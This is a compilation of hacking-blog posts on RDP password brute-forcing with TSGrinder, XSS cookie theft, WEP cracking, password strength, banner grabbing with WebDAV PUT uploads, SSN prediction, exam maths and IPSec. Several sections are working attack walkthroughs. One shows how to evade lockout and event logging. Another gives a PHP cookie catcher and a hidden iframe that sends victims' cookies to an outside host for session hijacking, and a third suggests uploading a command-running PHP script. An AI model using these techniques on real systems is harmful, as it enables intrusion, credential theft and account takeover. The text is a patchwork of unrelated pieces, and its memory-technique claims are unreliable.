tsgrinder

TSGrinder is a Terminal Server (RDP) brute-force tool. It runs dictionary attacks and has a very useful leet function. Granted, the leet file and dict file it ships with are weak to start with, but that is easily remedied. If you run the command with no arguments you get the following.
c:\tsgrinder>tsgrinder.exe
tsgrinder version 2.03

Usage:
tsgrinder.exe [options] server

Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator')
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)

Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1

The built-in example shows the syntax well. For this example I will be attacking my own server.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator 192.168.2.1
password aaa - failed
password abc - failed
password academia - failed
password academic - failed
password access - failed
password ada - failed
password admin - failed
password adrian - failed
password adrianna - failed
password aerobics - failed
password airplane - failed
password password - success!

Once tsgrinder finds the password it reports success and logs the mstsc session off. Since the bundled dict file is weak, I recommend googling for a proper word list. This will make life a lot easier. The leet file is also pretty weak by default. This is all it has:
l 1
e 3
t 7
s 5
Feel free to extend it with more substitutions such as:
a @
o 0
etc. I also recommend targeting the administrator account for these attacks, since by default the built-in Administrator account is not subject to lockout, however many password attempts you make. Also, as you may have noticed, tsgrinder tries 5 passwords, disconnects, reconnects and tries 5 more. This is because a log entry won't appear until you get the password wrong on 6 consecutive attempts, so this tool won't leave a Windows event log entry either. Now for the 1337: you just add the "-l" switch to the command.

C:\tsgrinder>tsgrinder.exe -w dict -l leet -u administrator 192.168.2.3
password academia - failed
password acad3mia - failed
password academic - failed
password acad3mic - failed
password access - failed
password acces5 - failed
password acce5s - failed
password acce55 - failed
password acc3ss - failed
password acc3s5 - failed
password acc35s - failed
password acc355 - failed

That gives you a rough idea of how it works. There is also the "-n" switch, which allows more than one simultaneous session. With one session you can try 5 passwords in about 10 seconds; with "-n 2" you can try 10 passwords in about 11 seconds. I haven't tried more than 2 simultaneous connections since it slows your computer down.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator -n 2 192.168.2.3
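To make the leet expansion concrete, here is a small Python re-implementation of the mutation tsgrinder applies when given a leet file. This is an added example written for this page, not tsgrinder's code; the leet file format ("<letter> <substitute>" per line) and the expansion order are inferred from the output above, and the word list is constructed.

```python
import itertools

# Constructed inputs: the default leet file shipped with tsgrinder (l->1, e->3,
# t->7, s->5) plus the two extra rules suggested above, and a few dictionary
# words. The file format is assumed to be "<char> <substitute>" per line.
LEET_FILE = """l 1
e 3
t 7
s 5
a @
o 0
"""

WORDS = ["academia", "academic", "access"]


def parse_leet(text):
    """Map each letter to the list of substitutes given for it (a letter may
    appear on several lines, e.g. both 'a @' and 'a 4')."""
    rules = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # skip blank or malformed lines
        rules.setdefault(parts[0], []).append(parts[1])
    return rules


def leet_variants(word, rules):
    """Yield the word and every combination of substitutions, original spelling
    first. Later positions vary fastest, which matches tsgrinder's observed
    order (access, acces5, acce5s, acce55, acc3ss, ...)."""
    choices = [[ch] + rules.get(ch, []) for ch in word]
    for combo in itertools.product(*choices):
        yield "".join(combo)


def expand_wordlist(words, rules):
    """Expand a whole word list, dropping duplicates while keeping order."""
    seen = set()
    out = []
    for word in words:
        for candidate in leet_variants(word, rules):
            if candidate not in seen:
                seen.add(candidate)
                out.append(candidate)
    return out


def variant_count(word, rules):
    """Number of candidates a word expands to: the product of
    (1 + substitutes) over its letters. Each candidate costs one RDP logon
    attempt (5 per connection), so a fat leet file multiplies run time fast;
    trim it to the substitutions the target population actually uses."""
    n = 1
    for ch in word:
        n *= 1 + len(rules.get(ch, []))
    return n


if __name__ == "__main__":
    rules = parse_leet(LEET_FILE)
    for candidate in expand_wordlist(WORDS, rules):
        print(candidate)
    print("access ->", variant_count("access", rules), "candidates")
```

With only the four default rules, "access" expands to the same eight candidates in the same order as the tsgrinder output above; adding "a @" doubles that to sixteen.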

XSS

Well, I was testing my friend's site for vulnerabilities and found it was vulnerable to Cross Site Scripting. The environment I used it on was a PHP forum. The first thing I needed to do was to see if the forum allowed users to run scripts. To do this I made a new thread with the script
<script>alert("Do you work")</script>
in it. And well, it worked! The next step was to see if the session was cookie based, so in the URL I put
javascript:alert(document.cookie)
and I got an alert with my cookies in it. So it's starting to look real good. Now you need a cookie catcher. It's a simple PHP script:
<?php
// Cookie catcher: logs whatever the victim's browser sends in ?c= together
// with the requesting IP, time and referer, then bounces the victim to a
// harmless page so nothing looks wrong.
$cookie  = isset($_GET['c']) ? $_GET['c'] : '';
$ip      = $_SERVER['REMOTE_ADDR'];
$date    = date("j F, Y, g:i a");
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: ' . $cookie . '<br>IP: ' . $ip . '<br>Date and Time: ' . $date . '<br>Referer: ' . $referer . '<br><br><br>');
fclose($fp);
header("Location: http://www.*******.com");
?>
So upload your PHP script to a web host that supports PHP. I used t35. Now you are going to make an iframe. You want it as small as possible so it isn't seen, so I set height, width and border to 0. You also want to set the document location to the location of your cookie catcher:
<iframe frameborder="0" height="0" width="0" src='javascript:void(document.location="http://********.t35.com/cookie.php?c="+document.cookie)'></iframe>

Now when a user who is logged in browses to your thread, you will catch their cookies in a file called cookies.html. Here is what the cookie I caught from my friend's site looked like:
PHPSESSID=dqecpehg45ah5431f1q12p4pd1
So now you have someone's cookie, what do you do? First make sure you are logged out of the site. Then you inject their cookie into your browser by typing the following in the URL bar:
javascript:void(document.cookie="PHPSESSID=dqecpehg45ah5431f1q12p4pd1")
Hit enter, then refresh, and you should be logged in as the user. One reason this would not work is if the session is tied to an IP address, meaning you need to have that IP in order to use the cookie.

WEP Cracking

This is a guide I wrote a couple of years back, as you can tell since Security Auditor has been BackTrack for over a year now. Most of the information still holds true.
Needed:
2 Prism 2/2.5/3 wireless cards
2 computers running Security Auditor

Key
# means channel number
PC means the AP’s client MAC address
AP means AP’s MAC address

Lets begin

Computer 1

Start up kismet

Press s to sort the AP’s

Press Enter on the AP your attacking get the following info
-Channel
-SSID
-BSSID

Press x to exit

Press shift + c to get the following information
-PC

Exit kismet

Open terminal and run the following commands
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel #
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s PC -B AP wlan0

Computer 2

Open terminal and run the following commands
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 #
cd /ramdisk
aireplay -i wlan0 -b AP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

You need a packet that looks like such
FromDS – 0
ToDS -1
BSSID – AP
SourceMAC – PC
Destination MAC – ff:ff:ff:ff:ff:ff

Press y to replay this ARP packet
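To make the filter above concrete, the Python below (an added example, not from the original guide or from aireplay) decodes the 802.11 data-frame header, resolves BSSID/source/destination from the ToDS/FromDS bits, and applies exactly the conditions listed: ToDS=1, FromDS=0, BSSID = AP, source = client, destination broadcast, 68 bytes. The 68-byte length is why the guide passes -m 68 -n 68: a WEP-encrypted ARP request is a 24-byte header, 4-byte IV, 8-byte LLC/SNAP, 28-byte ARP and 4-byte ICV. The MAC addresses and frames are constructed.

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def parse_80211(frame):
    """Decode the 802.11 MAC header and work out which of the address fields
    is BSSID, source and destination. The meaning of Addr1..Addr3 depends on
    the ToDS/FromDS bits in the second Frame Control byte."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc0, fc1 = frame[0], frame[1]
    ftype = (fc0 >> 2) & 0x3            # 0 management, 1 control, 2 data
    to_ds = fc1 & 0x01
    from_ds = (fc1 >> 1) & 0x01
    protected = (fc1 >> 6) & 0x01       # the "WEP" bit
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if not to_ds and not from_ds:       # ad hoc: DA, SA, BSSID
        dst, src, bssid = a1, a2, a3
    elif to_ds and not from_ds:         # client -> AP: BSSID, SA, DA
        bssid, src, dst = a1, a2, a3
    elif not to_ds and from_ds:         # AP -> client: DA, BSSID, SA
        dst, bssid, src = a1, a2, a3
    else:                               # WDS (both set): RA, TA, DA, then SA in Addr4
        if len(frame) < 30:
            raise ValueError("4-address frame without Addr4")
        dst, bssid, src = a3, a2, frame[24:30]
    return {"type": ftype, "to_ds": to_ds, "from_ds": from_ds, "wep": protected,
            "bssid": mac_str(bssid), "src": mac_str(src), "dst": mac_str(dst),
            "length": len(frame)}


def is_arp_candidate(frame, ap, client):
    """The selection aireplay is given above: ToDS=1, FromDS=0, BSSID == AP,
    source == the client, destination broadcast, exactly 68 bytes."""
    h = parse_80211(frame)
    return (h["type"] == 2 and h["to_ds"] == 1 and h["from_ds"] == 0 and h["wep"] == 1
            and h["bssid"] == ap and h["src"] == client and h["dst"] == BROADCAST
            and h["length"] == 68)


def build_data_frame(to_ds, from_ds, addr1, addr2, addr3, body, protected=1):
    """Constructed test frame: Frame Control for a data frame (type 2,
    subtype 0), zero duration, three addresses, zero sequence control."""
    fc1 = to_ds | (from_ds << 1) | (protected << 6)
    header = (struct.pack("<BBH", 0x08, fc1, 0) + mac_bytes(addr1)
              + mac_bytes(addr2) + mac_bytes(addr3) + struct.pack("<H", 0))
    return header + body


def select_frames(frames, ap, client):
    """Indexes of the frames worth replaying."""
    return [i for i, f in enumerate(frames) if is_arp_candidate(f, ap, client)]


# Constructed sample capture: one real candidate and three near misses.
AP = "00:11:22:33:44:55"          # BSSID read from kismet
CLIENT = "66:77:88:99:aa:bb"      # associated client MAC
ENCRYPTED_ARP = bytes(44)         # 4-byte IV + 36 bytes ciphertext + 4-byte ICV; contents irrelevant here
SAMPLE_FRAMES = [
    build_data_frame(1, 0, AP, CLIENT, BROADCAST, ENCRYPTED_ARP),            # what we want
    build_data_frame(0, 1, BROADCAST, AP, CLIENT, ENCRYPTED_ARP),            # the AP relaying it out: FromDS, skip
    build_data_frame(1, 0, AP, CLIENT, "00:11:22:33:44:99", ENCRYPTED_ARP),  # unicast, not ARP, skip
    build_data_frame(1, 0, AP, CLIENT, BROADCAST, bytes(200)),               # broadcast but too big, skip
]

if __name__ == "__main__":
    for i in select_frames(SAMPLE_FRAMES, AP, CLIENT):
        print("replay candidate", i, parse_80211(SAMPLE_FRAMES[i]))
```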

Computer1

Since you got the above packet, you can close void11.

Open terminal and run
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 #
cd /ramdisk
airodump wlan0 cap1

Once you have 100,000 IVs, exit for 64-bit keys; 800,000 for 128-bit keys.

Open terminal
cd /ramdisk
aircrack -f 2 -m AP -n 64/128 -q 3 cap*.cap
(-n is the key length: 64 or 128)

In a while you should have your WEP key.

How I’d Hack Your Weak Passwords

If you invited me to try and crack your password, you know, the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?

Let’s see… here is my top 10 list. I can obtain most of this information much more easily than you think, and then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.
  1. Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
  2. The last 4 digits of your social security number.
  3. 123 or 1234 or 123456.
  4. “password”
  5. Your city, or college, football team name.
  6. Date of birth – yours, your partner’s or your child’s.
  7. “god”
  8. “letmein”
  9. “money”
  10. “love”
Statistically speaking, that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…

Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)
One of the simplest ways to gain access to your information is through the use of a Brute Force Attack. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org has a list of the Top 10 FREE Password Crackers right here.
So, how would one use this process to actually breach your personal security? Simple. Follow my logic:
  • You probably use the same password for lots of stuff, right?
  • Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
  • However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
  • So, all we have to do now is unleash Brutus, wwwhack, or THC Hydra on their server with instructions to try say 10,000 (or 100,000 – whatever makes you happy) different usernames and passwords as fast as possible.
  • Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
  • But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post to remedy that problem.)
And how fast could this be done? Well, that depends on three main things: the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.
Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities – or gets shut down trying.
Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters – like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.

Password Length   All Characters             Only Lowercase
3 characters      0.86 seconds               0.02 seconds
4 characters      1.36 minutes               0.46 seconds
5 characters      2.15 hours                 11.9 seconds
6 characters      8.51 days                  5.15 minutes
7 characters      2.21 years                 2.23 hours
8 characters      2.10 centuries             2.42 days
9 characters      20 millennia               2.07 months
10 characters     1,899 millennia            4.48 years
11 characters     180,365 millennia          1.16 centuries
12 characters     17,184,705 millennia       3.03 millennia
13 characters     1,627,797,068 millennia    78.7 millennia
14 characters     154,640,721,434 millennia  2,046 millennia

Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.
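As an added example (not part of the original article), the Python below recomputes the table. Every row works out to about one million guesses per second, which is an assumption inferred from the figures, not one the article states; the "all characters" column corresponds to the 95 printable ASCII characters. The charset_size helper encodes the article's reasoning that adding a capital or a symbol forces the attacker into a larger set, which only holds if the attacker does not already know which character classes the password uses.

```python
# Character classes behind the two columns of the table (constructed here):
# 26 lowercase letters, and the 95 printable ASCII characters for "all".
LOWERCASE = 26
PRINTABLE_ASCII = 95

# Guess rate that reproduces the article's figures. Every row in the table
# works out to roughly one million guesses per second; this is inferred from
# the numbers, the article never states it.
GUESSES_PER_SECOND = 1_000_000

SECOND = 1.0
MINUTE = 60.0
HOUR = 3600.0
DAY = 86400.0
MONTH = 30.44 * DAY
YEAR = 365.25 * DAY
CENTURY = 100 * YEAR
MILLENNIUM = 1000 * YEAR


def keyspace(charset_size, length):
    """Number of candidate passwords of exactly this length."""
    return charset_size ** length


def exhaust_seconds(charset_size, length, rate=GUESSES_PER_SECOND):
    """Worst case: every candidate tried. On average the password falls after
    half the keyspace, so halve this for the expected time."""
    return keyspace(charset_size, length) / rate


def human(seconds):
    """Render a duration in the units the article's table uses."""
    for limit, unit, name in ((MINUTE, SECOND, "seconds"), (HOUR, MINUTE, "minutes"),
                              (DAY, HOUR, "hours"), (MONTH, DAY, "days"),
                              (YEAR, MONTH, "months"), (CENTURY, YEAR, "years"),
                              (MILLENNIUM, CENTURY, "centuries")):
        if seconds < limit:
            return f"{seconds / unit:.3g} {name}"
    return f"{seconds / MILLENNIUM:,.0f} millennia"


def charset_size(password):
    """Size of the union of the standard classes the password draws from,
    i.e. the set a brute-forcer must search if it knows only which classes
    were used (the article's 'add a capital and an asterisk' argument)."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(not c.isalnum() for c in password):
        size += 33   # the remaining printable ASCII: punctuation and space
    return size


def table(max_len=14):
    """(length, all-characters time, lowercase-only time) rows, as in the article."""
    return [(n, human(exhaust_seconds(PRINTABLE_ASCII, n)), human(exhaust_seconds(LOWERCASE, n)))
            for n in range(3, max_len + 1)]


if __name__ == "__main__":
    for n, every, lower in table():
        print(f"{n:2d} characters  {every:>28}  {lower:>16}")
    for pw in ("password", "Passw*rd"):
        print(pw, "->", charset_size(pw), "symbols,", human(exhaust_seconds(charset_size(pw), len(pw))))
```

Change GUESSES_PER_SECOND to see how the article's "Google would be 1,000 times faster" remark moves every row, and note that an offline attack on a leaked hash database runs orders of magnitude faster than the online logins the article has in mind.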
Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable – but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?
Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.
Here are some password tips:
  1. Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ’0′, or even better an ‘@’ or ‘*’. (i.e. – m0d3ltf0rd… like modelTford)
  2. Randomly throw in capital letters (i.e. – Mod3lTF0rd)
  3. Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
  4. Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
  5. You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
  6. Since it can be difficult to remember a ton of passwords, I recommend using Roboform for Windows users. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link.
  7. Mac users can use 1Password. It is essentially the same thing as Roboform, except for Mac, and they even have an iPhone application so you can take them with you too.
  8. Once you’ve thought of a password, try Microsoft’s password strength tester to find out how secure it is.
By request I also created a short RoboForm Tutorial. Hope it helps…
Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?
Often people also reason that all of their passwords and logins are stored on their computer at home, which is safe behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network – after which time they will own you!
Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.
I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.
Please, be safe. It’s a jungle out there.

Banner Grabbing

In more boredom I figured I would do something easy, simple and usually overlooked. We are going to use netcat to do some HTTP server banner grabbing.

# nc 12.200.x.x 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/html
Content-Location: http://10.1.1.120/WebInterface.htm
Last-Modified: Sat, 29 Mar 2008 16:03:16 GMT
Accept-Ranges: bytes
ETag: "569b6d66b691c81:1d8a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 22 Jun 2011 14:07:14 GMT
Connection: close

Just for the record, the headers a server returns (the Server banner in particular) can be changed or spoofed, so treat them as a hint rather than proof.

So we connect on port 80 and issue a HEAD request.
The Content-Location header leaks an internal IP address, here 10.1.1.120. When I see a 10.x address on an internal network I usually guess it is subnetted with CIDR, since the rule of thumb is not to have more than 500 hosts per subnet, so I'm guessing 10.1.1.0/24.

Next it tells us they are running IIS 6.0, which ships with Windows Server 2003 or Windows XP Professional x64 Edition.

Next we will see what methods are available to us, by sending an OPTIONS request.

OPTIONS / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Date: Wed, 22 Jun 2011 14:15:15 GMT
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, PUT, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

From here we can see which methods are available, and PUT is allowed; I believe this is a very underutilized method. So next we can put a file up, malicious or otherwise. Here is my file.

# cat 1.txt
blah

Next you need to know how big the file is, since the request must carry the exact byte count in Content-Length.
#wc -m 1.txt
5 1.txt (5 bytes: "blah" plus the trailing newline)

#nc 12.200.x.x 80
PUT /1.txt HTTP/1.0
Content-Type: text/html
Content-Length: 5

blah
After the headers comes an empty line and then the 5 bytes of the file itself; netcat only sends what you type or pipe into it.

Some servers will give you a status message and some will not.
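The Python below is an added example (not from the original post) that does the same HEAD and OPTIONS probing over a raw socket and parses out what the walk-through reads off by eye: the Server banner, the internal address leaked in Content-Location, WebDAV support, and the methods the server admits to, flagging the ones that let you write. The sample responses embedded in it are constructed from the headers shown above so the parser runs offline, and host and port are placeholders.

```python
import socket

# Constructed responses modelled on the headers shown above (not captured
# live), so the parsing can be exercised without a target.
SAMPLE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Length: 230\r\n"
    "Content-Type: text/html\r\n"
    "Content-Location: http://10.1.1.120/WebInterface.htm\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Connection: close\r\n\r\n"
)
SAMPLE_OPTIONS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "DAV: 1, 2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, PUT, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "Content-Length: 0\r\n\r\n"
)

# Methods that modify content on the server, plus TRACE (cross-site tracing).
RISKY_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "TRACE"}


def parse_headers(raw):
    """Split a raw HTTP response into (status line, {header: value}).
    Header names are case-insensitive, so they are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def summarize(head_raw, options_raw):
    """Condense a HEAD and an OPTIONS response into the facts that matter."""
    _, head = parse_headers(head_raw)
    _, opts = parse_headers(options_raw)
    allowed = {m.strip().upper() for m in opts.get("allow", "").split(",") if m.strip()}
    public = {m.strip().upper() for m in opts.get("public", "").split(",") if m.strip()}
    return {
        "server": head.get("server"),
        "powered_by": head.get("x-powered-by"),
        "internal_location": head.get("content-location"),
        "webdav": "dav" in opts,
        "allowed": sorted(allowed),
        "risky": sorted((allowed | public) & RISKY_METHODS),
    }


def put_request(path, body, host):
    """Build a PUT exactly as it must go on the wire: Content-Length is the
    byte count of the body, and a blank line separates headers from body."""
    header = (f"PUT {path} HTTP/1.0\r\nHost: {host}\r\nContent-Type: text/plain\r\n"
              f"Content-Length: {len(body)}\r\n\r\n").encode("ascii")
    return header + body


def exchange(host, port, request, timeout=5.0):
    """Send one raw request and return the reply (network; not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


def grab(host, port=80):
    """HEAD then OPTIONS against a live host, summarized."""
    head = exchange(host, port, f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii"))
    opts = exchange(host, port, f"OPTIONS / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii"))
    return summarize(head, opts)


if __name__ == "__main__":
    print(summarize(SAMPLE_HEAD, SAMPLE_OPTIONS))   # offline, on the constructed responses
    print(put_request("/1.txt", b"blah\n", "target.example").decode("ascii"))
```

Public and Allow are compared separately because IIS lists what the server supports in Public and what the requested resource accepts in Allow; a method missing from Allow for / can still be accepted on another path.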


Just as an example of what you can do: you can upload a PHP script that runs commands, and through this change root/admin passwords; if there are other services on the machine, say RDP or SSH, you can then get an actual session on the victim. This is an old technique but it is still valid today against misconfigured servers and in my opinion should not be overlooked.

Researchers crack SSN Algo(Social Security Number Algorithm)

Social Security numbers have a predictable pattern, according to Carnegie Mellon University researchers, who have developed a reliable method of cracking a person’s SSN based on data gleaned from multiple sources, including profiles on social networking sites.
The researchers cracked the algorithm, guessing the first five digits of a SSN on the first try for 44% of people born after 1988. The method is even more reliable with a 90% success rate of cracking SSNs of individuals born after 1988 in less populated states. In fewer than 1,000 attempts, the researchers could identify a complete SSN in 8.5% of those born after 1988, “making SSNs akin to 3-digit financial PINs.”

Mastering Mathematics for hacking basics

To master hacking to the core, your mathematics skills should be strong. In this article I present some facts required for mastering mathematics, using a simple example of how to crack the IIT-JEE mathematics paper. You may wonder what the connection is between IIT-JEE and hacking. According to a recent study conducted by Appin, the best hackers in India hail from the IITs. This piece is meant to show people how IITians think about mathematics. The goal is to get the basics right.
“I have practiced more questions than others, still I score less. Can you tell me why?” This is a common question students ask after any Mathematics paper. The answer to this question lies in the fact that practice does make perfect, but the assumption is that you practice the right set of questions, and do them correctly while practicing as if you were giving the actual paper.
There are some interesting facts about the pattern of the IIT-JEE mathematics examinations. For example, in 1996 the exam had really simple questions but was lengthy. In that scenario rarely would a person complete the exam, so success lay in the ability to select the set of questions that needed the minimum time and fetched the maximum marks. In 2000, however, the exam had only 10 questions, each with 2 parts where, although not mentioned explicitly, the result of the 1st part was used in the 2nd in every question. Students who didn’t identify this had a tough time attempting the 2nd part and wasted a lot of time. Taking another instance, in 2001 the examination level was moderate, with a good mix of simple and tricky questions. A person with a cool mind and the ability to identify the simple questions would generally perform well. Someone who attempted the tricky ones first might get discouraged and fail to attempt the easier ones as well. I strongly recommend that you solve previous years’ papers and identify their patterns while solving. This will help you identify the patterns of the examinations to come, revise concepts and create an exam-like atmosphere during practice.
There are also certain tips I will pitch in for certain topics There are several problems that can boggle a student in Quadratic Equations. My recommendation for students is to draw a graph of all possible cases of a quadratic equation to get a mental picture of the problem. Let’s try to draw the graph of
2 x^2 + ax+ 2 =0

  • The coefficient of x^2 is 2 >0 thus the graph opens upwards
  • Discriminant D = a ^ 2 -16. Assuming real roots, D>= 0 for a>= 4 or a<= -4 which implies that the lowermost point of graph intersects the axis under these conditions.
  • For complex roots, the lowermost point is above X-Axis.
  • Intersection with Y –Axis can be found out by putting x=0, comes out to be y=2.
Thus within half a minute or a minute you will be able to visualize the whole problem.
Certain other topics like Progressions, Logarithms, and inequalities keep on coming either as a part of a bigger question or as short questions. You need to revise these topics as they are generally simple and form part of bigger questions, and without understanding them thoroughly, you may lose out on a simple big question. It may seem basic to many students, but many often get confused between log (to the base 10) and ln (to the base e) during the IIT-JEE examination. This kind of sensory acuity during the exam again requires one to maintain a cool head during exam and loads of practice to embed these in one’s nervous system as opposed to just doing it once or twice.
You can also revise formula of logarithms right now. The formula mentioned below are good enough to solve most of the problems in logarithms. You can also try out some problems in logarithms using these formula
Integral calculus is a very important chapter and you need to try right methods while solving a question. It may seem very basic to you but I have seen people solving the problems in following ways:
∫ tan x dx = ∫ (sin x / cos x) dx = (∫ sin x dx) / (∫ cos x dx)
This is absolutely wrong: differentiation has a rule for quotients, but the integral of a quotient is not the quotient of the integrals. So beware of these disastrous mistakes as they might cost you selection; don’t dismiss them as silly mistakes. All the formulae of integral calculus need to be learnt and applied in a very structured manner. This is necessary when you practise questions towards the end, as the way you apply them during practice will be the way you apply them in your exam.
The science of Neuro-Linguistic Programming has come up with clever techniques to remember formulae. One such technique is to move your eyes to the upper right while recalling a formula; this is said to accelerate visualization. In fact I used to learn all my formulae using this technique. For example, in coordinate geometry I would first visualize the figure, say a circle, and then memorize all the formulae by visualization. This not only prevented confusion among different formulae but also helped in fast retrieval.
At the same time you can use a small trick. Problems in which you want to prove questions you can work the solution other way round. For example, in case you know that you need to prove a result, you can assume the result and backtrack to see if the premise or the assumptions hold true. For example – If you are given the following problem: a>4, prove that the graph of equation: 2 x^2 + ax+ 2 =0 intersects X-Axis twice, you can solve this problem by assuming that the equation has real unequal roots (implying intersection) and find assumption when the statement is true (a>4).
Generally the topic Complex numbers is considered tough. There are many problems in Complex Numbers which become the easiest in Coordinate Geometry and Vectors. Remember, you can always imagine a complex number as a 2-D Vector.
In the end I would like to mention a few checkpoints:
  • On solving a problem, learn its technique as well as similar problems that can be solved using same technique.
  • Learn all formula in a structured way keeping in mind the kind of questions that use them.
  • Practice previous year papers and understand their psychology.
  • During the examination identify the pattern of examination and perform accordingly.
  • Enjoy Life and Relax

IPSec in IPv6

This paper describes what IPSec is and why it matters, why IPv6 is considered to be better than IPv4 in terms of security, gives a brief description of its other features, and discusses why it should be considered at the same level as IPv4 when it comes to security. It also covers some new threats that IPv6 presents apart from the common threats (DoS attacks, flooding, man-in-the-middle attacks (MITM), application layer attacks, rogue attacks) that are prevalent in IP networks using the IPSec protocol.
1) What is IPSec?
IPSec is a suite of Internet security protocols that operates at Layer 3, the network (IP) layer, to protect traffic from unauthorized parties. It uses the following services to protect packets between sender and receiver:
Origin authentication (AH, and ESP with authentication) – the receiver verifies that the packet really came from the claimed sender.
Data confidentiality (ESP) – data is encrypted before being sent to the receiver.
